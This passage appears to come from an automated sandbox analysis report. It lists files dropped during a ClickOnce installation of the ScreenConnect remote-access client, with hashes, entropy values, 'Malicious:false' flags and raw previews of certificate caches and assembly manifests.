                                                                                                                                                                                                                                                  Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                                  Entropy (8bit):3.527255541181304
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:kK6K8vF/aJmsN+SkQlPlEGYRMY9z+s3Ql2DUevat:iK4FdTkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                  MD5:B8DA250B955455DA2C60717FC0C22805
                                                                                                                                                                                                                                                  SHA1:DC92AE48545A1175A4E09C974E96AC69C29ECE5D
                                                                                                                                                                                                                                                  SHA-256:D9E2AAE548FB4B709465DC59AE1FC5AFF0A68056579D2E3B93E20D059E2F4521
                                                                                                                                                                                                                                                  SHA-512:67C278AF84D1CDCA4E1DA51C7A116E84D4BFCEC996997CD4D2122AA7DA388FAC539AD10CD0E7A29CEB774259B958A0621D3E6A7492913DF8ADD72D161C1FF759
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:p...... .........oq.a3..(..................................................<K2.. .........p.........$.....(=........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                  Entropy (8bit):3.2300897763107805
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:kKf0rNtL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:XiqDImsLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                  MD5:72AD35824C698B9D90196D3E737C475C
                                                                                                                                                                                                                                                  SHA1:A4282692B0DEEE6CAF4236013AD69F1FEEA5A945
                                                                                                                                                                                                                                                  SHA-256:B542FB1EF072621349D1495D08E66E4E7F4DF2402A32A39E22980283378C6DCA
                                                                                                                                                                                                                                                  SHA-512:5B88B32F539B4CB43EFF6557B0A403B3DC453970AA15949C40933F0AD6540DBAA7D0EDE7BA7AF77A97F9E08036BDDD9489AB913EA1E1BC5EB2889DA5007BBA1C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:p...... ...........t.2..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):308
                                                                                                                                                                                                                                                  Entropy (8bit):3.194931322323056
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:kK7klfzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:XtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                  MD5:E36CE6E88935DD78C8014277A34F968E
                                                                                                                                                                                                                                                  SHA1:99D3E35825BA2BF2DAC4900C1D5E04D6DECEAC49
                                                                                                                                                                                                                                                  SHA-256:16C05357BA825A6462A4A2224ED6A9457005658592D28ECFF2D23E27434F7026
                                                                                                                                                                                                                                                  SHA-512:D00144DB94872C35A879F96332EE9C5C7C0D965D0B02BE8B89BDB784338495F3D55834C7106A33DC81AD3D777122A98FE13C5C7FA01918FAC7D47C3FBC5B91F8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:p...... ..........T#-2..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):412
                                                                                                                                                                                                                                                  Entropy (8bit):3.968277444337835
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:ZhJqk7ymxMiv8sFBSfamB3rbFURMOlAkr:BPymxxv7Sf13rbQJr
                                                                                                                                                                                                                                                  MD5:26FBAD6DE5DF50DBA12ECDA4DFBAD91E
                                                                                                                                                                                                                                                  SHA1:E36A2E77797DF5D9C7821A1CA70E0F83F0B5A931
                                                                                                                                                                                                                                                  SHA-256:00E04530932DB1A0FA0E4AC13B922B5C4A45620E0417A9748333AC8D5DC2F7C1
                                                                                                                                                                                                                                                  SHA-512:234EA08713858F3CEEF1C54191E27357498918D39315C9507A6D62CBB9C1234E92538B0033CE08C62F11E313CBECD2D0356D5BA5E48FAFE10AC553E8BB6B4D00
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:p...... ....(...Q..."2..(...................D1......6......................6.. ........X.7.1.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):254
                                                                                                                                                                                                                                                  Entropy (8bit):3.0528988669712294
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:kKWLhLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:+NLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                  MD5:8804E82049FEE0001EA53237D972AD97
                                                                                                                                                                                                                                                  SHA1:38FE880B44CF09513222BC5514EA9D55330A98A0
                                                                                                                                                                                                                                                  SHA-256:A906F2BE97C74C8C14557C3478C6E7037C00C39AC4ADF52CFAB2B78666613C6A
                                                                                                                                                                                                                                                  SHA-512:B478F9B0CB9694C649AB86671866F692EEAB040D8233B3B8C8FDB2DC072EF714569E29A7431754ACDEE726506483B7400D4AEDD50F2B503DDDBEF2F692584B1D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:p...... ....l.....^..2..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):25496
                                                                                                                                                                                                                                                  Entropy (8bit):5.615417083549069
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:elqUkoGo26tX9DkX9R/QPIBM7YguPkuaCH7kLgOv0TcI/:esx626tX9DkX9R/QPI+0gu8uxHOgOvIR
                                                                                                                                                                                                                                                  MD5:4E30948F3FF7D1908072E8BA586B3DF8
                                                                                                                                                                                                                                                  SHA1:BAB0CBBE38B99AB51E54202E366A61667C0F5A8E
                                                                                                                                                                                                                                                  SHA-256:88146FDC8139E14021697F442BDA3499AA6C7B9A8E9CADAD0E745360B4E036E2
                                                                                                                                                                                                                                                  SHA-512:E247D160D9C74996FFA5AFD2B506DA3B1BBAB318820CBB34CB98D5EB1C9B7357C3FCAE9627435B8E7CCBC99A592122DD998D1C38D9DBCF1069465626CDDB52B6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:PcmH.............f.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R...O.&r..VzU......3LD.SY...[s.T..<\...........`.......=...P...S...V...Z...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):17866
                                                                                                                                                                                                                                                  Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                  MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                  SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                  SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                  SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3452
                                                                                                                                                                                                                                                  Entropy (8bit):4.193916446057946
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:lJ3uWWGeV+WwQXlmLLxDPoNV1TpzLhIYX:r3iJUHxDSTJNf
                                                                                                                                                                                                                                                  MD5:C9335262CF2AD960207E261B54AB6004
                                                                                                                                                                                                                                                  SHA1:EBB7F58314AE1E1B3A1AA9CB4B503646DC0C28A9
                                                                                                                                                                                                                                                  SHA-256:1930DDFE557C2FA46545ABD76C43B2DB811233B5BCAF8938FB9AF2BBAB549373
                                                                                                                                                                                                                                                  SHA-512:8873E334E047ADFEB72E895DF8823E56E62C57D47F0C888AD9D1BD3CCAE75C79D1304F51006E9D50A2C9EB8327130ED49DA3B698AE341DFA966E9FF3BF6F631A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:PcmH...........^.A.l#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...............................................k...............................................k...............................................k...............................................k...nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1216
                                                                                                                                                                                                                                                  Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                  MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                  SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                  SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                  SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):5260
                                                                                                                                                                                                                                                  Entropy (8bit):4.273635945286269
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:ENq6R84TeV+Ww7mk9O43jYHlIgBXC35dX1vMwnjIbm:sR84UJC9tUHlXBXEjd
                                                                                                                                                                                                                                                  MD5:5BE3E8251A12056385186DAA715E1ACE
                                                                                                                                                                                                                                                  SHA1:2415E041AFECF98F4B3FB6364ADE89148D916F14
                                                                                                                                                                                                                                                  SHA-256:636E0DEF4DF4202D5DE0A1AD809231E91AEAFD49B7D90D109DC91135CB7575B9
                                                                                                                                                                                                                                                  SHA-512:E0C25C96F77DE9AE4A58ECB32DDFD13E1D6A6AE32BACA6AE6760ED634544DBAB1E31CDA0F3224B2B94EF0728D26CE9DA32331D65A07B39DF9E130C55DBAEF823
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:PcmH.........Y...L*4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........3..L.G.....[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u"...F.....Ey%.....E..X.(...s".I...R)....+.`...m,......;../............... ...#...&...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........l...@.......................................(........... .......(...(...<.......d.......l.......|...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(...............d...........p...............................................k...............................................k...............................................k...............................................k.......................
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1982
                                                                                                                                                                                                                                                  Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                  MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                  SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                  SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                  SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):6588
                                                                                                                                                                                                                                                  Entropy (8bit):4.135225750015584
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:zMmxLeV+WwwU8WpZ2LRheuMl2UfdVaMslksJqi/D5:nx8JwpZ2LRhyl5dVzLw75
                                                                                                                                                                                                                                                  MD5:4AEDE05B07476C5FE44D688235F3FCC0
                                                                                                                                                                                                                                                  SHA1:A62C3F3F798BB29BFDE9111B7FCCB176AF58B06F
                                                                                                                                                                                                                                                  SHA-256:30341AC5FE51A1C97BBE4DC26A721789E130B04552ED7257500035AA71880C82
                                                                                                                                                                                                                                                  SHA-512:DBBA1105E9910C07940C9EC49753468519C4F3AAE2BED037B9052DB6B508E6CF65E84607300306A366C8074897752AC8B74B1E621A6D165B6E890D71DC240EEE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:PcmH..........1m.O!.@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.........}'.d................z..w.....[~31.X....y..&..d......B(.........C....."...^.ie...u%...[s.T..<(...s".I...R)...F.....Ey,.....E..X./...f..VC..2...O.&r..Vz5......;..8.....V....X;........... ...#...&...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...X...........@........................... .......0...(...8.......`.......h.......x...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(.......................(...$.......L.......T...(...l...................(.......................(...........................................................................k.......................
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2573
                                                                                                                                                                                                                                                  Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                  MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                  SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                  SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                  SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3032
                                                                                                                                                                                                                                                  Entropy (8bit):4.567688006237518
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:7MQScvgFe6S+9oww7g47u2ehojqSJCVJzruPPtnwbb:7XSc6eV+WwwnleajpYruPPtnEb
                                                                                                                                                                                                                                                  MD5:5CC8B449186266E674F6AE7C98B6FD9A
                                                                                                                                                                                                                                                  SHA1:E9A3C3AB9F3043DCF2815BA6B8672DACD5E8C999
                                                                                                                                                                                                                                                  SHA-256:B1AC10F5B7674280268392D26FD8ADE5F29848429C7848777D65D2FBFB522BC8
                                                                                                                                                                                                                                                  SHA-512:AF92370A2B8D7AF1FC9C9656A86F40C26CAA85438822ACACF3969C22A275847DFA6F1A2C21598ACF8112D826983FA691C80ECD88165C5289D96371B722356765
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:PcmH..........LGX...............T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...........................................................k...............................................k...............................................k...nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............<...........MdSp ...$....... ...".............Bi urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1041
                                                                                                                                                                                                                                                  Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                  MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                  SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                  SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                  SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):14612
                                                                                                                                                                                                                                                  Entropy (8bit):5.744910745597779
                                                                                                                                                                                                                                                  Encrypted:false
